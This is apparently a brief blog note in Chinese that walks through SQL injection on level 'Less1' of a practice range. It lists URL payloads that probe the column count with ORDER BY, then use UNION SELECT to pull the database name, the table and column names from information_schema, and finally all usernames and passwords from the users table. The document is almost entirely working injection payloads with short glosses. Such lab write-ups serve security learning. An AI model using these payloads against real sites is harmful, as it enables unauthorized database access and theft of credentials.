?id=1
?id=99'union select 1,2,3--+
查看占位
?id=1' order by 3--+
尝试出表有几列
?id=1' order by 4--+
说明只有三列
?id=99' union select 1,database(),3--+
查询当前使用的数据库的名称
?id=99' union select 1,group_concat(table_name),3 from information_schema.tables where table.schema='security'--+
查询security表中有哪些表
?id=99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
查询users表中有哪些信息
?id=99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+
展示所有users表中的信息
标签:union,Less1,99,--+,sql,table,靶场,id,select From: https://blog.csdn.net/2301_80144612/article/details/143469786